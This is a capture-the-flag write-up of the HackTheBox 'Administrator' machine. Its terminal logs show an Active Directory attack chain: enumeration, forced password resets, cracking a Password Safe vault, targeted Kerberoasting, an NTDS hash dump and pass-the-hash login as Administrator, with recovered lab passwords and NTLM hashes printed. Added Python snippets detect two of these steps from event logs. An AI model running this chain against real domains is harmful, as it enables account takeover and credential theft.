As is common in real-life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia, Password: ichliebedich
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.42 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 09:19 EDT
Nmap scan report for 10.10.11.42
Host is up (0.063s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
57979/tcp open unknown
57983/tcp open unknown
57985/tcp open unknown
58007/tcp open unknown
58039/tcp open unknown
62805/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 17.29 seconds
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.42 -p 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,57979,57983,57985,58007,58039,62805 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 09:20 EDT
Nmap scan report for 10.10.11.42
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-04 19:56:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57979/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
57983/tcp open msrpc Microsoft Windows RPC
57985/tcp open msrpc Microsoft Windows RPC
58007/tcp open msrpc Microsoft Windows RPC
58039/tcp open msrpc Microsoft Windows RPC
62805/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h35m55s
| smb2-time:
| date: 2025-08-04T19:57:49
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.91 seconds
Check whether the credentials work:
nxc smb 10.10.11.42 -u Olivia -p ichliebedich --timeout 999
nxc smb 10.10.11.42 -u Olivia -p ichliebedich --shares
Nothing special.
ftp administrator.htb
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb 10.10.11.42 -u Olivia -p ichliebedich --users
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.10.11.42 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.42 445 DC Administrator 2024-10-22 18:59:36 0 Built-in account for administering the computer/domain
SMB 10.10.11.42 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.42 445 DC krbtgt 2024-10-04 19:53:28 0 Key Distribution Center Service Account
SMB 10.10.11.42 445 DC olivia 2024-10-06 01:22:48 0
SMB 10.10.11.42 445 DC michael 2024-10-06 01:33:37 0
SMB 10.10.11.42 445 DC benjamin 2024-10-06 01:34:56 0
SMB 10.10.11.42 445 DC emily 2024-10-30 23:40:02 0
SMB 10.10.11.42 445 DC ethan 2024-10-12 20:52:14 0
SMB 10.10.11.42 445 DC alexander 2024-10-31 00:18:04 0
SMB 10.10.11.42 445 DC emma 2024-10-31 00:18:35 0
SMB 10.10.11.42 445 DC [*] Enumerated 10 local users: ADMINISTRATOR
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# rusthound-ce --domain administrator.htb -u Olivia -p ichliebedich -c All --zip
---------------------------------------------------
Initializing RustHound-CE at 09:34:50 on 08/04/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-08-04T13:34:50Z INFO rusthound_ce] Verbosity level: Info
[2025-08-04T13:34:50Z INFO rusthound_ce] Collection method: All
[2025-08-04T13:34:51Z INFO rusthound_ce::ldap] Connected to ADMINISTRATOR.HTB Active Directory!
[2025-08-04T13:34:51Z INFO rusthound_ce::ldap] Starting data collection...
[2025-08-04T13:34:51Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:34:56Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=administrator,DC=htb
[2025-08-04T13:34:56Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:22Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=administrator,DC=htb
[2025-08-04T13:35:22Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:51Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=administrator,DC=htb
[2025-08-04T13:35:51Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:52Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=administrator,DC=htb
[2025-08-04T13:35:52Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-04T13:35:52Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=administrator,DC=htb
[2025-08-04T13:35:52Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-08-04T13:35:52Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-08-04T13:35:52Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-08-04T13:35:52Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 11 users parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 1 computers parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] 73 containers parsed!
[2025-08-04T13:35:52Z INFO rusthound_ce::json::maker::common] .//20250804093552_administrator-htb_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 09:35:52 on 08/04/25! Happy Graphing!
Standard procedure:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# bloodyAD --host 10.10.11.42 -d administrator.htb -u Olivia -p ichliebedich set password MICHAEL Admin123!
[+] Password changed successfully!
Verify:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u michael -p Admin123!
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\michael:Admin123!
Continue:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# bloodyAD --host 10.10.11.42 -d administrator.htb -u MICHAEL -p Admin123! set password BENJAMIN Admin123!
[+] Password changed successfully!
Verify:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u BENJAMIN -p Admin123!
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\BENJAMIN:Admin123!
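One way a defender would spot this hop (olivia resets michael, michael resets benjamin) in the DC's Security log, as an added example that is not part of the writeup; the record fields, the helpdesk01 account and the 30-minute window are assumptions and the events are constructed:

```python
"""Detect the password-reset hop used above (olivia -> michael -> benjamin).
Added example, not part of the original writeup. A domain controller logs
Event ID 4724 ("an attempt was made to reset an account's password") with the
account that performed the reset as Subject and the account changed as Target;
the records below are constructed, not real log data."""
from datetime import datetime, timedelta

# Constructed Security-log records: (timestamp, EventID, SubjectUserName, TargetUserName)
EVENTS = [
    ("2025-08-04T13:40:10", 4724, "olivia", "michael"),
    ("2025-08-04T13:41:02", 4724, "michael", "benjamin"),
    ("2025-08-04T13:45:30", 4723, "emma", "emma"),          # user changed own password
    ("2025-08-04T13:55:00", 4724, "helpdesk01", "emma"),    # legitimate helpdesk reset
]

# Accounts allowed to reset other users' passwords (assumption for the example).
ALLOWED_RESETTERS = {"helpdesk01"}
CHAIN_WINDOW = timedelta(minutes=30)


def _t(rec):
    return datetime.fromisoformat(rec[0])


def unauthorized_resets(events, allowed=ALLOWED_RESETTERS):
    """4724 events where a non-approved account reset someone else's password."""
    return [
        (subj, tgt)
        for _, eid, subj, tgt in events
        if eid == 4724 and subj.lower() != tgt.lower() and subj.lower() not in allowed
    ]


def reset_chains(events, window=CHAIN_WINDOW):
    """Find A->B followed by B->C inside `window`: the account whose password was
    just reset immediately resets another one, i.e. someone pivoting along
    ForceChangePassword edges rather than an administrator doing housekeeping."""
    resets = sorted((e for e in events if e[1] == 4724), key=_t)
    chains = []
    for i, first in enumerate(resets):
        for second in resets[i + 1:]:
            if _t(second) - _t(first) > window:
                break
            if second[2].lower() == first[3].lower():
                chains.append((first[2], first[3], second[3]))
    return chains


if __name__ == "__main__":
    print("unauthorized:", unauthorized_resets(EVENTS))
    print("chains:", reset_chains(EVENTS))
```

Both checks fire on the constructed data; the self-service change (4723) and the helpdesk reset are ignored.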
This user is in the Share group, so it is either SMB shares or FTP.
SMB:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u BENJAMIN -p Admin123! --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\BENJAMIN:Admin123!
SMB 10.10.11.42 445 DC [*] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
Nothing there.
FTP:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:root): BENJAMIN
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -l
229 Entering Extended Passive Mode (|||58213|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||58215|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************| 952 1.51 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (1.51 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# file Backup.psafe3
Backup.psafe3: Password Safe V3 database
Crack it directly with hashcat:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# hashcat -h |grep -i 'Password Safe V3'
5200 | Password Safe v3 | Password Manager
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
Backup.psafe3:tekieromucho
Download Password Safe and open the vault with the recovered password.
Three credential pairs are recovered:

| Username | Password |
|---|---|
| alexander | UrkIbagoxMyUGw0aPlj9B0AXSea4Sw |
| emily | UXLCI5iETUsIBoFVTj8yQFKoHjXmb |
| emma | WwANQWnmJnGV07WQN8bMS7FMAbjNur |
emily turns out to have GenericWrite over ETHAN, and emily is also a member of the Remote Management Users group.
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> gc ../desktop/user.txt
1badf521398**************************
GenericWrite is available here, but there is no CA in the domain, so Shadow Credentials are out; Targeted Kerberoasting is worth a try instead.
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# targetedKerberoast.py -v -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$d516fe9d3d85f7de8a063bfe804701fe$...
[VERBOSE] SPN removed successfully for (ethan)
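The verbose lines above (SPN added, hash printed, SPN removed) are exactly the trace this technique leaves on the domain controller. An added detection example, not from the writeup or the tool; the record layout, field names and the 10-minute window are assumptions and the events are constructed:

```python
"""Detect the targeted-Kerberoast footprint the tool output above leaves behind:
an SPN is written onto a user account, a service ticket is requested for that
account, and the SPN is removed again. Added example, not part of the writeup;
the records are constructed. Event 5136 (directory object modified) needs a
SACL auditing writes to servicePrincipalName; 4769 is logged by default."""
from datetime import datetime, timedelta

# Constructed Security-log records (only the fields the checks need).
EVENTS = [
    {"t": "2025-08-04T14:01:00", "id": 5136, "subject": "emily", "object": "ethan",
     "attr": "servicePrincipalName", "op": "add"},
    {"t": "2025-08-04T14:01:03", "id": 4769, "subject": "emily", "service": "ethan",
     "etype": "0x17"},                                  # RC4-HMAC ticket
    {"t": "2025-08-04T14:01:05", "id": 5136, "subject": "emily", "object": "ethan",
     "attr": "servicePrincipalName", "op": "delete"},
    {"t": "2025-08-04T14:30:00", "id": 4769, "subject": "olivia", "service": "DC$",
     "etype": "0x12"},                                  # normal AES ticket for a computer
]
WINDOW = timedelta(minutes=10)


def _t(e):
    return datetime.fromisoformat(e["t"])


def targeted_kerberoast(events, window=WINDOW):
    """(actor, victim) pairs where an SPN add is followed within `window` by a
    4769 for that account and then an SPN delete on the same object."""
    findings = []
    for a in events:
        if not (a["id"] == 5136 and a["attr"] == "servicePrincipalName" and a["op"] == "add"):
            continue
        later = [e for e in events if _t(a) <= _t(e) <= _t(a) + window]
        ticket = any(e["id"] == 4769 and e["service"].lower() == a["object"].lower()
                     for e in later)
        removed = any(e["id"] == 5136 and e["object"] == a["object"] and e["op"] == "delete"
                      for e in later)
        if ticket and removed:
            findings.append((a["subject"], a["object"]))
    return findings


def rc4_user_tickets(events):
    """4769 requests with RC4 (0x17) for non-computer accounts: every roastable
    hash of the form $krb5tgs$23$ comes from such a ticket."""
    return [(e["subject"], e["service"]) for e in events
            if e["id"] == 4769 and e["etype"] == "0x17" and not e["service"].endswith("$")]
```

In the constructed data the add/ticket/delete sequence on ethan is flagged while the AES ticket for the DC$ computer account is not.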
Crack it with hashcat, which recovers ethan's password (used below).
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nxc smb administrator.htb -u ethan -p limpbizkit --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\ethan:limpbizkit
SMB 10.10.11.42 445 DC [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.11.42 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.42 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
SMB 10.10.11.42 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.42 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
SMB 10.10.11.42 445 DC administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
SMB 10.10.11.42 445 DC administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
SMB 10.10.11.42 445 DC administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
SMB 10.10.11.42 445 DC administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
SMB 10.10.11.42 445 DC administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
SMB 10.10.11.42 445 DC administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
SMB 10.10.11.42 445 DC administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
SMB 10.10.11.42 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
SMB 10.10.11.42 445 DC [+] Dumped 11 NTDS hashes to /root/.nxc/logs/ntds/administrator.htb_None_2025-08-04_170333.ntds of which 10 were added to the database
SMB 10.10.11.42 445 DC [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.10.11.42 445 DC [*] cat /root/.nxc/logs/ntds/administrator.htb_None_2025-08-04_170333.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.10.11.42 445 DC [*] grep -iv disabled /root/.nxc/logs/ntds/administrator.htb_None_2025-08-04_170333.ntds | cut -d ':' -f1
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/root.txt
2125192b3911b2&*************